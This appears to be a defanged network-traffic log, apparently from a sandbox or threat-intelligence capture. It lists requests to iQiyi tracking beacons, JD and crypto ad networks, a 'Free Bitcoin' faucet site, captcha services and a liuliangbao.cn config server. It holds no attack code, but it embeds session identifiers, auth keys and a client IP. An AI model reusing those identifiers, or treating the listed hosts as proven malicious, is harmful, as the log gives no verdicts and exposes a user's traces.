hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heyLT0pUyDiycWLTHdeJJaAdRT4maqHQLm9Y0AoCVAtZFJmB0rLnPKe4Awt6Yb-DkFjW8GmYsoqfjuDFyd-_33gEKpi2PHNuN-K8WV-zOdz9qxfzUr9BQGPFQ71MpT1UOK20_jRDH2XBUi6uJfEYhV9I3WMZWOKqr8vXvqhXEwLNLQk2B9X7RuULD4wZcA4WJD7s9GaHjd_JwDEtxobOrxX2D8KGBYiZSpTER0cZ8YEvjn2jqHCVe-dJp14Mc2F6Zszm6zwTXyROtTHpyWjCtYpY1kQe_wR-fcV_vEag-5GxfIq3O9uZYW4SQvx94a1YipoLuLAFXviTZpLe_1WYbMdepAHZNPONGVwjzQqaL89TcPXZiM0TCTEI1-H1A-2ljb&v=404&seq=2	106.39.169.66
hxxp://hm.e.shifen.com/hm.gif?cc=0&ck=1&cl=24-bit&ds=1440x900&ep={"netAll":1466,"netDns":1383,"netTcp":79,"srv":583,"dom":2056,"loadEvent":6899,"qid":"","bdDom":0,"bdRun":0,"bdDef":0}&et=87&fl=23.0&ja=1&ln=en-us&lo=0&nv=1&rnd=2074899456&si=53b7374a63c37483e5dd97d78d9bb36e&st=1&v=1.2.11&lv=1
hxxp://msg.video.dns.iqiyi.com/vodpb.gif?type=piaoshhtestmayttf&des=h5p2ptest&brs=mozilla%2F4.0%20(compatible%3B%20msie%207.0%3B%20windows%20nt%205.1%3B%20trident%2F4.0%3B%20sv1%3B%20gtb7.3%3B%20u9dnfsh)%20qqbrowser%2F6.14.15493.201&mse=0&p2p=0&p=pc&_=1484906111480
hxxp://a326.r.akamai.net/crossdomain.xml
hxxp://px.3.cn.gslb.qianxun.com/prices/mgets?skuids=J_10263952097,J_1014668736,J_1712213997,J_1683079458,J_10481689014,J_2823639,J_10293479220,J_2631300,J_1002498991,J_10666538087,J_1612802959,J_1319192906,J_10654177939,J_1767125187,J_10292956874,J_1311634685,J_10608382784,J_1031724397&type=1&callback=dsp_1484906111088&r=1484906111107	111.206.230.21
hxxp://data.video.dns.iqiyi.com/crossdomain.xml
hxxp://msg.video.dns.iqiyi.com/cp2.gif?x=http://www.iqiyi.com/common/flashplayer/20170119/1050f98c2359.swf\|\|http://www.iqiyi.com/common/flashplayer/20170119/036300cf212b7b.swf&p=v&lc=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&s=1484906112396&t=s&b=0&c=0&v=572044000&av=AdManager 3.63.0&fp=WIN 23,0,0,185&e=98f3f08439c68c9b57b3520f0696fb2c&vv=5.3.2.47&y=qc_100001_100226&pl=0
hxxp://msg.video.dns.iqiyi.com/cp2.gif?s=1484906112427&t=s&av=3.12.0&e=98f3f08439c68c9b57b3520f0696fb2c&vv=5.3.2.47&rd=1509&y=qc_100001_100226&p=pl&rc=1
hxxp://a326.r.akamai.net/common/fix/default_player_16_9.png?arg=01000011010000000000
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_heEnmDgzEgJtbifhOVPNJDZL6mH1RGK8un5EUb_9dOg2LZm5QrA9b6KN-vXxSfzlPcMjoWBWB2Qi4sH93q7P68fKkAAFjL92af8brD9oOnSmt21L8iRmx_VVVc5QzQnuJiLqMVVudbR0NjyzLkTwqwEXN4scuxPw9hAirzu5jtOf4jwortaew7ipPMC0QuHuM33WD46Le0Ah331azG5hFqVzyu30AH1QsCnIPhwy44crCrLdRkmS6JAgqn-ZsgEAAXZsn4spVbueuUvN5eqLh_fEhs6XE-Aj-rUVIQhXt8o8OCExHVX9CCAPXguqrBMbysrUEQySUQPfJa6J5KiRS7hgjReGDX_6K_HenD3hEg7_xIRqfNClH-V7eA5dXazejC&v=404&seq=3	106.39.169.66
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_hemtZz9E4T5Ml0FxIsOi7b9e6CUfixrWj0zyePKODPs2fGk99YKgmd96V7bd6iaxaASWVta4Uw2mVxa4JJOvd72JpgyGS2PR8XsdZpL87BcDLqEmShyhjsRfsafQQCZPFA_hKVZqjQdX3ELYetFcbXVAqCVOv1PdrOCh9nJwGQ_nznrRLps1ozknMgd89vuQqyu2i2zBsgyoqwlq3M2Ei-nUNOiBXoVGinGT2gWsz02E60z1_fh9cnGM_ZO7FTFH5ur-yg7X3l5JNppNRnOcHHgQMIr1IchhqvYCJpDCaDLQ8X-7NyDg5ouL6a6ILIEXLFe7KV8Q7Jc_-mR7kLuhqxXj3OZDFLEZECiJ1zoySaZfcuRvd5f3QK8YEjeW6nSRRe&v=404&seq=4	106.39.169.66
hxxp://data.video.dns.iqiyi.com/uid?tn=0.016473443247377872
hxxp://cache.video.dns.iqiyi.com/crossdomain.xml
hxxp://data.video.dns.iqiyi.com/uid?tn=0.896643178537488
hxxp://passport.pps.dns.iqiyi.com/pages/user/proxy.action
hxxp://e5233.a.akamaiedge.net/js/qiyiV2/20170119180153/jobs/pc/ugcBodanPlay.js
hxxp://data.video.dns.iqiyi.com/uid?tn=0.4324387479573488
hxxp://cache.video.dns.iqiyi.com/vms?key=fvip&src=1702633101b340d8917a69cf8a4b8c7c&tvId=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&vinfo=1&tm=952&qyid=&puid=&authKey=bc6811ba189dbccef005d66f72770de2&um=0&pf=b6c13e26323c537d&thdk=&thdt=&rs=1&k_tag=1&qdx=n&qdv=2&vf=746cf15c43ca5b06081b3fa8a82442b0
hxxp://adsz.wagbridge.tanx.alimama.com.gds.alibabadns.com/ex?i=mm_26632162_2469125_22608113
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he9IK0zj-LilCRyIGNw1kitd8XCIJu4Ib482Juro__479AUxpU8Df2fi-fQzKtSBnuwH-MVzd9FU8gOZlxlgfuwhfXAH7eBcC4JPMuv7GPXIy5H6gl9t1AHhoBDab6lSrK2hGmB9VSACPHoeXmattKj2FxyzAvW-kl6pOZ9FECT3hiXOWmOEGWzBFFP7FEgw2XkdeskaSCWNzoJUvCYRix5cGUhpe-tJkLjG3b6cWv6BLpg0FSYhNA6_xbdlUStbXW_eT7FI2G2829RaOJ4Cg2UNe5vaswjY5D6nGwYjrdWrFbZcKjkLM8sjUk0cn6CyI6rdSkdq2ECosvv9Tk13C4xfcX4ALs1iT1psPlXO0Zun2sMkJbvIKg5Q3SUwTvcH-b&v=404&seq=6	106.39.169.66
hxxp://t7z.cupid.dns.iqiyi.com/crossdomain.xml
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_helkJjAewu65OsBLgXRnmTvc3AVFJ-nBZMBU9KtqCZLcy-AbNWPYbf7GmNI2lEK32K0VG9tOWibFGYRxkdwLZs5Z_dpN_c2yorTnWLFwdrSIdgMAMNTUw9-xMvBUaHYCIPzc6pDoco1r_7AkBO7zWbf-wMIKHXW9-KGCLr2eNRdOXZFm96vsDuT6fi5nGdSRbTIXyUNUHw5PAioQCMVkoQplfyQWGcuT8fsDo6aV3YKw5o9EnGZ8z8EJoHWXYsHF8mFFwAQx4F1XtsLGWJS-OiGzF9KGKQmrCd_NuB4fMXjbIsdGYDd50APKO2_iqR3Qp5xUWJB2hTbvkbU7C0R1d1TNpcFply462Nm5gG0IbFXACnMqE3nLLbIwETMolAEJR8&v=404&seq=7	106.39.169.66
hxxp://e5233.a.akamaiedge.net/player/cupid/common/clear.swf?r=xv1v5n
hxxp://ap.liuliangbao.cn/clt/config/bl_6.5.dat?t=1484423401&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=plyract&plyract=vrld&vms=1&tl=2539&aid=&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=&lev=&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=&ispur=&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.12644612696021795
hxxp://cache.video.dns.iqiyi.com/sci/gm/3/572044000/?src=1702633101b340d8917a69cf8a4b8c7c
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=plyract&plyract=load&prgr=0&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.22120652068406343
hxxp://a1294.w20.akamai.net/b?c1=1&c2=7290408&c3=10&c4=11&c5=&c6=&c7=http://www.iqiyi.com/v_19rra3jt70.html&c8=&c9=&c10=&c11=5088e17771f6d54476f95dc61f9e80b4
hxxp://e5233.a.akamaiedge.net/common/flashplayer/20170119/1050c72eeb6.swf
hxxp://t7z.cupid.dns.iqiyi.com/show2?a=qc_100001_100226&e=E15qBgIABAQBbwEWU1MPBlcAOwwAFlNGDGofAx4AHAJGRTsMABZVUQxuF1dEDwMQHV5vF14NABZBMAwBFkJAC0FFL0INABZAR2IAFkEPUUJLUnlCRg0DHgdsHwAWR14LGRcrQQofH0dGKB9ZQVtLX18AMFwfRm8BCC1DUQNYRgFBTTdFXVwWRgxvF0ZVW1YLSFs5AlYACAQCZlIGCFELVERUPQIFAgBWAWkIBlZQAFVXFGIBFkkNAA==&h=1484906112411&s=60d34018ac24eb58180b7eb57af7bbf5
hxxp://ap.liuliangbao.cn/clt/config/runtask_6.5.dat?t=1480915691&checksum=&cid=58C013CF767C4DCAA7E8D33815C20EF6
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he05GuFArQbiUANdeAtwYBETZptE4eVTuj1sbd2fuD3zywAAso39i17ndkUX3xBZAppZQQWvRmRlGgOfySA424aa6BXXOxY_96R7SqErsW-Nq8vNLEaVPrymNi0G5oKfCmisXgdZiIakTaQmegvalckrYP1qxFqULtgSPtgy9qqYBL8cHKJOXYmPRoO7vKUq7auJsgnlUAZmL6MNrhftmmV5yInUlT-maxeLnWdP0dbIPjg8LRZPcDjf0KTChgJ5lPqf68rDJ_3ONy0cVlrH0PpbjyTzIyN4b9wp3X2kV3ceuB38qWchaGJkSsMVD0xh4AlXLlHMgqTN9C-WhoSPtt34CKnncVVnPw2MI9C6CZNXfh7rPuP3RGKCgPUpCbI2HU&v=404&seq=9	106.39.169.66
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_hebtboSJ6LnIVrJSLFTFAor6VibSw4roh9pVbMZp9UcE8uIoVcWJijeAaMqIiza0gk14gOAuJt5BfBvNg_B0OM4DdUu5kuIzf2jvfzxWGhvqSoIXIN5Zsxd5XfxO6X9nF8C6KTWUFOCcu2k-Y_sjHFjrhTRV5VyRzvC3wmInmnXYGXJTZIdnAjyfzOhwuYrGE8d_t79q2bd1hawuJc__CcDSM4Vqm-MSDgNPASm8mE09PgVXumdj8hkrzimh_Rd2RRvNxxus369cMbtIMMIcIvTvF_Ru1wbI9R7YfGziPepiLZu9Sl1LX_rGaA3-bqb_BcQFWaNWM1rqad5eXbrCMtxvTHnL6i2KVYpZpKCKZbOUMhYuHYOuvjDcPqd0w1NRwx&v=404&seq=8	106.39.169.66
hxxp://static.n.shifen.com/v.gif?pid=324&qiyi_cookie=&t=1484906112271
hxxp://cpro.e.shifen.com/cpro/ui/html/sync.htm?sid=&p=iqiyi&t=1484906112271
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=plyract&plyract=ready&purl=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&vvfrmtp=manclick&rfr=&lrfr=DIRECT&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.8087925375439227
hxxp://msg.video.dns.iqiyi.com/core?t=15&ptid=11&pf=1&p=10&p1=101&c1=10&r=572044000&aid=204432001&u=5088e17771f6d54476f95dc61f9e80b4&pu=&v=3.3.12.9&ra=2&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&ce=11d91127a84babbf6dabdf9e702b5f03&ve=0418909173dcc97c13d68d5c2ee32172&vfrm=&vfrmtp=manclick&sdktp=1&hu=&ht=0&mod=cn_s&islocal=0&rfr=&lrfr=DIRECT&rn=0.6126211592927575
hxxp://t7z.cupid.dns.iqiyi.com/show2?a=qc_100001_100226&e=E15qBgIABAQBbwEWU0QPA19QcQMeBAcWVWIEBxZXUwtARThFDQEWXAxtAQQEAQAGQVJ5Xw0AFkBeYgEWQEAPBlcTLAwAFkBGDG4XQQ1IWwxAU28BAAAAAAFvBAMGHlFCS1NkS1kKAQABbwEAAAICBkdQbx1TRAoACiVYCgECAgZBU28BAAAAAwhzUkQKAglMGFluAQAAAAABbwEAAAYCGhIXZQELSlkKAG8BAAACAgZBU2wDARxTRAtvF0NGDwEYR1BxARZFXA1ZK0VACh0dQQYUcVhBWUlZHzxeXR9EbQdIES1QA1pEBwFxWURdXhRATFN5R1VZVA0IZ1cDVgIKAkJaPAcIUwlSBGhTAwUAAlBBVWYHVlICUxcoDAAWSw8G&h=1484906114377&s=8f6f04431c47096fdb4b10b9161f986a
hxxp://e5233.a.akamaiedge.net/common/flashplayer/20170118/10382a1b82aa.swf
hxxp://e5233.a.akamaiedge.net/common/flashplayer/20161122/1823925a82d4.swf
hxxp://msg.video.dns.iqiyi.com/jpb.gif?rdm=1738841934&qtcurl=http://www.iqiyi.com/v_19rra3jt70.html?list=19rrkqccqe&rfr=&lrfr=DIRECT&jsuid=o5rodndzg8of8s4mwfefai5c&qtsid=1484906110,1484906110,1484906110,1&ppuid=&platform=11&fcode=&ffcode=&coop=&weid=11d91127a84babbf6dabdf9e702b5f03&pru=&fvcode=&mod=cn_s&tmplt=bodantplt&flshuid=5088e17771f6d54476f95dc61f9e80b4&as=c6ef95c1f39a49124dae509aae8e1a88
hxxp://irs-azure-east.irs01.com/crossdomain.xml
hxxp://msg.video.dns.iqiyi.com/tmpstats.gif?type=yhls20130924&usract=140707adinit&pla=11&mod=cn_s&tn=0.23817403800785542
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=rptusr&newusr=1&suid=5088e17771f6d54476f95dc61f9e80b4&tn=0.5403782017529011
hxxp://x.jd.com.gslb.qianxun.com/dsp/np?log=4aXECCduGxfW2Kxn3xtmYEaJaUJeklshqNOf3rzI2HvNIbc7LErCtp8riNRcI_he4eNkbQAXSVjSzyFW81pDZ1LQvRk0CVy9J18PeJAbVVt-IMC1Zl8l1WjWIKsObHQmfGpfbZyKbox8daLfvnzv-6kCE7nnFtZ3paiDX_-ZsB8MuOjgvFxwEQr8ayg0miQDuoxxxoh7E4Gd6pZxmF9AGchxt3FyQ8IGgTXhFf4aSOO2YdX2qGA5tfgMvXwz7YD21LeOReOWn5in9ya3T5q9mXTvU4J_aADuR2ne1UtxV3ZpKoaYgF0LScgRk1v50wpzWtQUBhjCXsPr2gs89m6NGFVIVT1MXAW1ITtUq2JnutP1epFGIuAh8bpninXTA140cE_nlxrycHwdZYnlyJfnsELu7IoeclyYRYdr2Z8s7RKZmdOeYrJ7saFdudE3V1Rj&v=404&seq=5	106.39.169.66
hxxp://coinsns.com/index.php?s=/lottery/index/index.html
hxxp://101.227.188.34/ics?a=194.242.96.218&b=9b9366963d49845dcaef1cf22d487ad8
hxxp://msg.video.dns.iqiyi.com/cp2.gif?ps=0&rd=1966&h=0&p=s&rc=1&s=1484906114377&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=60d34018ac24eb58180b7eb57af7bbf5&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0
hxxp://a1470.r.akamai.net/crossdomain.xml
hxxp://msg.video.dns.iqiyi.com/cp2.gif?ps=0&h=0&p=i&s=1484906114377&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&v=572044000&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=60d34018ac24eb58180b7eb57af7bbf5&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=plyract&plyract=activeplay&aid=204432001&tvid=572044000&vid=787ab6983c8a883fa3c5190ce3cac804&cid=10&lev=2&puid=&pru=&veid=0418909173dcc97c13d68d5c2ee32172&weid=11d91127a84babbf6dabdf9e702b5f03&newusr=1&pla=11&visits=&sttntp=0&plyrtp=0&plyrver=3.3.12.9&z=&suid=5088e17771f6d54476f95dc61f9e80b4&diaoduuip=&plid=572044000&vvfrom=lianbo&vfrm=&vfm=&restp=2&ispur=0&as=048c93b654d2bd4a3e9c933afb514399&qdv=2&isdm=0&isstar=0&hu=&mod=cn_s&videotp=0&tn=0.4783940138295293
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=stuenv&plyrver=3.3.12.9&pla=11&os=Windows 7&browser=MSIE&dpi=1276X846&flashver=WIN 23,0,0,185&newusr=1&vid=787ab6983c8a883fa3c5190ce3cac804&aid=204432001&tvid=572044000&cid=10&purl=http://www.iqiyi.com/v_19rra3jt70.html&lev=2&puid=&pru=&suid=5088e17771f6d54476f95dc61f9e80b4&visits=&pla=11&weid=11d91127a84babbf6dabdf9e702b5f03&veid=0418909173dcc97c13d68d5c2ee32172&coop=&ctgid=0&plid=572044000&vvfrom=lianbo&mod=cn_s&tn=0.4808125551789999
hxxp://coinsns.com/Public/zui/css/zui.css
hxxp://static.dns.iqiyi.com/crossdomain.xml
hxxp://msg.video.dns.iqiyi.com/vpb.gif?flag=startvisits&newusr=1&vid=787ab6983c8a883fa3c5190ce3cac804&aid=204432001&tvid=572044000&cid=10&purl=http://www.iqiyi.com/v_19rra3jt70.html&lev=2&puid=&pru=&suid=5088e17771f6d54476f95dc61f9e80b4&visits=&pla=11&weid=11d91127a84babbf6dabdf9e702b5f03&veid=0418909173dcc97c13d68d5c2ee32172&coop=&ctgid=0&plid=572044000&vvfrom=lianbo&mod=cn_s&tn=0.2609360576607287
hxxp://pagead46.l.doubleclick.net/pagead/js/adsbygoogle.js
hxxp://nlwl.dns.iqiyi.com/apis/urc/getqd?authcookie=null&containsUgc=1&agent_type=1&subTypes=1,7,9&channelIds=1,2&callback=window.Q.__callbacks__.cbji48aq
hxxp://e5233.a.akamaiedge.net/js/common/ares2.min.js?1484906115570
hxxp://coinsns.com/Public/css/core.css
hxxp://coinsns.com/Public/js/ext/magnific/magnific-popup.css
hxxp://coinsns.com/Public/zui/css/zui-theme.css
hxxp://a1470.r.akamai.net/20161122/3a/3c/0ad38a6488686acc96d4ec67497a33b9.xml?tn=0.09199875919148326
hxxp://msg.video.dns.iqiyi.com/cp2.gif?ps=0&rd=1170&h=0&p=s&rc=1&s=1484906115563&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=8f6f04431c47096fdb4b10b9161f986a&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0
hxxp://coinsns.com/Public/js.php?f=js/jquery-2.0.3.min.js,js/com/com.functions.js,js/core.js,js/com/com.toast.class.js,js/com/com.ucard.js
hxxp://coinsns.com/Public/js/com/com.talker.class.js
hxxp://coinsns.com/Application/Lottery/Static/css/lottery.css
hxxp://coinsns.com/Addons/CheckIn/Static/css/check.css
hxxp://msg.video.dns.iqiyi.com/cp2.gif?ps=0&h=0&ri=0:n1:1000000001251;0:n1:1000000001268;0:n1:1000000001827;0:n1:1000000005931;0:n1:1000000008849;&oi=0:n1:1000000001251;0:n1:1000000001268;0:n1:1000000001827;0:n1:1000000005931;0:n1:1000000008849;&p=i&s=1484906115563&di=0:n1,88,5000000911968,:1000000005931;&a=9b9366963d49845dcaef1cf22d487ad8&t=s&b=204432001&c=10&v=572044000&av=AdManager 3.63.0&e=98f3f08439c68c9b57b3520f0696fb2c&rid=8f6f04431c47096fdb4b10b9161f986a&vv=5.3.2.47&l=MTk0LjI0Mi45Ni4yMTg=&y=qc_100001_100226&d=57&g=0
hxxp://msg.video.dns.iqiyi.com/vodpb.gif?url=hxxp://www.iqiyi.com/common/flashplayer/20170118/10382a1b82aa.swf&tag=done&curl=hxxp://www.iqiyi.com/common/flashplayer/20170118/10382a1b82aa.swf&useTime=1154&dur=5644
hxxp://cache.video.dns.iqiyi.com/jp/vi/572044000/787ab6983c8a883fa3c5190ce3cac804/?status=1&callback=window.Q.__callbacks__.cb2r2oc2
hxxp://irs-azure-east.irs01.com/irt?_iwt_id=null&_iwt_UA=UA-iqiyi-100009&jsonp=SetIDA0&_iwt_p1=A-0-0&_iwt_p2=572044000&_iwt_p3=56-0-0-0&_iwt_p4=787ab6983c8a883fa3c5190ce3cac804&_iwt_p5=&_iwt_muid=5088e17771f6d54476f95dc61f9e80b4&r=5889
hxxp://msg.video.dns.iqiyi.com/b?t=21&u=5088e17771f6d54476f95dc61f9e80b4&pu=null&pf=1&bstp=24_dmfc&p2=1011&qpid=572044000&aid=0&block=1409011_dm&p=10&p1=101&_=2134069781
hxxp://msg.video.dns.iqiyi.com/b?t=20&p=10&p1=101&pf=1&block=B&r=&pu=null&u=5088e17771f6d54476f95dc61f9e80b4&jsuid=o5rodndzg8of8s4mwfefai5c&ce=11d91127a84babbf6dabdf9e702b5f03&re=1504*175629&clkx=0&clky=0&mod=cn_s&tm=8205&tmplt=dianshijunewtmplt&qpid=572044000&rseat=608241_cls_default&_=1166079991
hxxp://nl.notice.dns.iqiyi.com/apis/msg/hasnew.action?count=5&agent_type=1&callback=window.Q.__callbacks__.cb3onixz
hxxp://so.dns.iqiyi.com/m?if=defaultQuery&response_type=2&platform=14&is_qipu_platform=1&u=5088e17771f6d54476f95dc61f9e80b4&pu=&callback=window.Q.__callbacks__.cbtskh2b
hxxp://coinsns.com/Public/zui/fonts/zenicon.eot?
hxxp://cache.video.dns.iqiyi.com/jp/recommend/videos?referenceId=572044000&albumId=0&cookieId=o5rodndzg8of8s4mwfefai5c&channelId=10&withRefer=false&area=swan&size=10&type=video&trimUser=false&pru=&playPlatform=PC_QIYI&callback=window.Q.__callbacks__.cbg39tfk
hxxp://pagead46.l.doubleclick.net/pagead/js/r20170116/r20170110/show_ads_impl.js
hxxp://coinsns.com/index.php?s=/lottery/index/verifygee/rand/J3g0ttxl.html
hxxp://coinsns.com/Public/static/qtip/jquery.qtip.css
hxxp://coinsns.com/Public/js/ext/atwho/atwho.css
hxxp://coinsns.com/Public/js.php?t=js&f=js/com/com.notify.class.js,static/qtip/jquery.qtip.js,js/ext/slimscroll/jquery.slimscroll.min.js,js/ext/magnific/jquery.magnific-popup.min.js,js/ext/placeholder/placeholder.js,js/ext/atwho/atwho.js,zui/js/zui.js&v=.js
hxxp://apps.cointraffic.io/js/?wkey=10E7Cr	37.0.25.88
hxxp://api.geetest.com/get.php?callback=gtcallback	198.11.176.80
hxxp://api.geetest.com/get.php?callback=gtcallback&_=1484906116454	198.11.176.80
hxxp://coinad.com/ads/show/show.php?a=3FMLHO8FY55DT&b=QP10TX6B6KV66
hxxp://mellowads.com/view/8A4F0C723F1C	104.20.132.4
hxxp://coinsns.com/Public/static/jquery.iframe-transport.js
hxxp://coinsns.com/Public/js/ext/lazyload/lazyload.js
hxxp://coinsns.com/Application/Lottery/Static/js/radialIndicator.min.js
hxxp://coinad.com/ads/show/show.php?a=3FMLHO8FY55DT&b=QAJCZO2RSCH65
hxxp://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V
hxxp://www-google-analytics.l.google.com/analytics.js
hxxp://coinad.com/ads/show/show.php?a=3FMLHO8FY55DT&b=DNXGITSPBPYNI
hxxp://coinad.com/ads/show/show.php?a=3FMLHO8FY55DT&b=VQY6CNGEKEK2J
hxxp://www-google-analytics.l.google.com/r/collect?v=1&_v=j47&a=1070368555&t=pageview&_s=1&dl=http://coinsns.com/index.php?s=/lottery/index/index.html&ul=en-us&de=utf-8&dt=Free Bitcoin - CoinSNS&sd=24-bit&sr=1366x768&vp=1344x635&je=1&fl=23.0 r0&_u=AAgAAEAAI~&jid=181594928&cid=150513197.1484906118&tid=UA-70454598-1&_r=1&z=1010198880
hxxp://coinad.com/ads/show/show.php?a=3FMLHO8FY55DT&b=9GMQOGUXRJ58I
hxxp://mellowads.com/css/size1.css?v16	104.20.132.4
hxxp://a1811.g.akamai.net/quant.js
hxxp://anycast-europe.quantserve.com.akadns.net/pixel;r=1302890811;a=p-pV8razYeGyZwj;fpan=1;fpa=P0-1340228538-1484906118834;ns=1;ce=1;cm=;je=1;sr=1366x768x24;enc=n;dst=1;et=1484906118834;tzo=-120;ref=http://coinsns.com/index.php?s=/lottery/index/index.html;url=http://blockadz.com/ads/show/show.php?a=MNKKAJHPC2F4X&b=8KUVPZMBBAG6V;ogl=
hxxp://api.geetest.com/static/js/geetest.5.10.0.js	198.11.176.80
hxxp://api.geetest.com/static/js/geetest.0.0.0.js	198.11.176.80
hxxp://api.geetest.com/get.php?gt=3386e03c620a4067f18fa92c370f1594&challenge=7185e65f5aea0024bf35c5c1275d75da&product=embed&offline=false&lang=en&type=slide&callback=geetest_1484906123874	198.11.176.80
hxxp://api.geetest.com/static/golden/style.3.2.0.css	198.11.176.80
hxxp://api.geetest.com/refresh.php?challenge=7185e65f5aea0024bf35c5c1275d75dal5&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906122184	198.11.176.80
hxxp://up.video.dns.iqiyi.com/ugc-updown/quud.do?dataid=572044000&type=2&userid=&flashuid=5088e17771f6d54476f95dc61f9e80b4&appID=21&callback=window.Q.__callbacks__.cbrokkg9
hxxp://api.geetest.com/refresh.php?challenge=7185e65f5aea0024bf35c5c1275d75da97&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906128459	198.11.176.80
hxxp://api.geetest.com/refresh.php?challenge=7185e65f5aea0024bf35c5c1275d75da5s&gt=3386e03c620a4067f18fa92c370f1594&callback=geetest_1484906123339	198.11.176.80
hxxp://cache.video.dns.iqiyi.com/jp/mixin/videos/572044000?callback=window.Q.__callbacks__.cbae6bg&status=1
hxxp://coinsns.com/index.php?s=/ucenter/public/getinformation.html
hxxp://coinsns.com/index.php?s=/lottery/index/btc_rate.html
hxxp://coinsns.com/index.php?s=/lottery/index/getlast.html
hxxp://apps.cointraffic.io/bnr?wkey=10E7Cr	37.0.25.88
hxxp://apps.cointraffic.io/bnr/?wkey=10E7Cr	37.0.25.88
hxxp://apps.cointraffic.io/css/slide/?key=zGLVXy	37.0.25.88
hxxp://apps.cointraffic.io/js/pnd2/script.packed.js	37.0.25.88
hxxp://apps.cointraffic.io/css_cr/slide/?key=zGLVXy&b=601	37.0.25.88
hxxp://coinsns.com/index.php?s=/lottery/index/verifygee/rand/IJnCjr0h.html
hxxp://api.geetest.com/get.php?callback=gtcallback&_=1484906133801	198.11.176.80
hxxp://www-google-analytics.l.google.com/collect?v=1&_v=j47&a=634634703&t=pageview&_s=1&dl=http://coinsns.com/index.php?s=/lottery/index/index.html&ul=en-us&de=utf-8&dt=Free Bitcoin - CoinSNS&sd=24-bit&sr=1366x768&vp=1344x635&je=1&fl=23.0 r0&_u=AACAAEAAI~&jid=&cid=150513197.1484906118&tid=UA-70454598-1&z=2073781349
hxxp://api.geetest.com/get.php?gt=3386e03c620a4067f18fa92c370f1594&challenge=70635a5a34b073f557c9bcaabf1c81ec&product=embed&offline=false&lang=en&type=slide&callback=geetest_1484906140926	198.11.176.80
